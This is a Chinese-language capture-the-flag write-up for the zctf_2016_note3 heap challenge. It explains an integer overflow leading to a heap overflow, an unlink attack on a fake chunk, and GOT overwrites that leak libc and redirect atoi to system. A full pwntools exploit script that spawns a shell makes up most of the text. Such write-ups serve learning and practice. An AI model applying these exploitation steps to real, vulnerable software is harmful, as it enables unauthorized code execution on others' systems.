一道典型的unlink題目整形溢出因爲i是無符號長整型如果輸入-1就會變得巨大實現堆溢出這裏應該可以用unlink泄露libc基址然後用fastbin attack打malloc_hook但是這裏有多次寫入的edit功能就很好做了
先申請4個chunk
然後unlink一個指針到bss段上
unlink的操作fake chunk的fd和bk必須指回自己也就是一個確定的值具體爲
fake chunk
fd=&p-0x18
bk=&p-0x10
還有需要注意prev_size和size的inuse位
完成後改寫free_got爲put_plt然後再次寫入第二個chunk爲atoi然後泄露再次寫入atoi爲system即可獲取shell
exp:
#!/usr/bin/python2
from pwn import *
local=1
if local==1:
p=process('../binary/zctf_2016_note3')
elf=ELF('../binary/zctf_2016_note3')
libc=elf.libc
else:
p=remote('node3.buuoj.cn',28100)
elf=ELF('../binary/zctf_2016_note3')
libc=elf.libc
def add(size,content):
p.sendlineafter('>>\n','1')
p.sendlineafter('1024)\n',str(size))
p.sendlineafter('content:\n',content)
def show():
p.sendlineafter('>>\n','2')
def edit(idx,content):
p.sendlineafter('>>\n','3')
p.sendlineafter('note:\n',str(idx))
p.sendlineafter('content:\n',content)
def delete(idx):
p.sendlineafter('>>\n','4')
p.sendlineafter('note:',str(idx))
lg=lambda address,data:log.success('%s: '%(address)+hex(data))
def exp():
payload=p64(0)+p64(0xb1)+p64(0x6020c8-0x18)+p64(0x6020c8-0x10)
add(0x90,payload) #0
add(0x0,'bbbb') #1
add(0x90,'cccc') #2
add(0x18,'dddd')
delete(1)
payload=p64(0)*2+p64(0xb0)+p64(0xa0)
add(0,payload)
delete(2)
edit(0,p64(0)*2+p64(elf.got['free'])*2+p64(elf.got['atoi'])+p64(0)+p64(elf.got['atoi']))
show()
edit(0,p64(elf.plt['puts'])[:-1])
delete(1)
atoi=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libcbase=atoi-libc.sym['atoi']
lg('libcbase: ',libcbase)
system=libcbase+libc.sym['system']
edit(3,p64(system)[:-1])
p.sendline('/bin/sh\x00')
p.interactive()
if __name__=="__main__":
exp()